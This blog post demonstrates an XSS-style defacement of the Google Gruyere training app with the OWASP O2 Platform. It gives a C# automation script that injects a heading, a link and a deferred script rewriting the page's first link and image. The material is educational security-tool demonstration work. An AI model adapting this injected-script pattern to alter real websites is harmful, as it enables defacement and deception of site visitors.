XSS with O2 script editor Defacement on Gruyere
Today's post walks step by step through an XSS defacement on Gruyere.
We already created our XSS builder with O2. Now we are going to do an XSS defacement.
Above is the regular Gruyere login page. Below is the defacement, with the IE script execution.
Here is all the code needed for the defacement.
    using O2.XRules.Database.Utils;
    using O2.XRules.Database.APIs;
    using O2.External.SharpDevelop.Ascx;
    using O2.External.SharpDevelop.ExtensionMethods;
    using O2.DotNetWrappers.Network;
    using O2.DotNetWrappers.DotNet;
    using O2.DotNetWrappers.Windows;
    using O2.DotNetWrappers.ExtensionMethods;
    using O2.Views.ASCX.classes.MainGUI;
    using O2.Views.ASCX.CoreControls;
    using O2.Views.ASCX.ExtensionMethods;
    using O2.Kernel.ExtensionMethods;
    using O2.Kernel;
    using O2.Interfaces;
    using System.Linq;
    using System.Xml.Linq;
    using System.Xml;
    using System.Collections.Generic;
    using System.Windows.Forms;
    using System.Drawing;
    using System;
    using O2.XRules.Database.Utils.O2;

    public class DynamicType
    {
        public void dynamicMethod(object returnData, System.Windows.Forms.Panel panel)
        {
            panel.clear();
            // Host an IE (WatiN) control in the O2 panel; silent(true) suppresses pop-ups
            var ie = panel.add_IE().silent(true);
            ie.open("http://google-gruyere.appspot.com/856783677371/login");

            // Locate the login DIV and highlight it so the edited element is visible
            var target = ie.elements("DIV").str("Gruyere: Login");
            target.flash();

            // Inject the defacement markup, plus a deferred script that rewrites
            // the first link and the first image on the page
            target.injectHtml("beforeBegin",
                "<h1>O2 Platform Demos</h1>" +
                "The best way to learn about the security vulnerabilities of this website is to use the <a href=\"http://o2platform\">OWASP O2 Platform</a>" +
                "<script DEFER> " +
                "  //alert(document.links[0].href);" +
                "  document.links[0].href = \"http://o2platform.com\";" +
                "  document.images[0].src = \"http://o2platform.com/images/a/" +
                "a0/6_22_2010_7_08_23_PM_tmp9E4.jpg\";" +
                "  //alert(document.images[0].sec);" +
                "  //document.images[1].href = " +
                "  //alert(document.images[1].href);" +
                "</script>");
        }
    }

    //O2File:WatiN_IE_ExtensionMethods.cs
    //using O2.XRules.Database.Utils.O2
    //O2Ref:WatiN.Core.1x.dll
This is what Dinis created, and it is what sits under the hood of these little scripts. It's a bit more complex.
I was speaking to Dinis, and after I questioned him about the code he explained some of it to me in his own words:
what happens when you select the 'show/hide generated source code' is that you see the actual method that gets compiled (basically I automatically put the text you put on the main script window inside that public object dynamicMethod(object returnData, string testString, int testNumber) method)
– the silent(true) in IE is just to prevent pop-ups (and sometimes you need to put it to false since you need to act on those popups)
– the ‘flash()’ method is used to slow down a little bit the script execution and so that you can see visually which HTML field is being edited
If you have any questions e-mail me. Matt Parsons, CISSP, MSM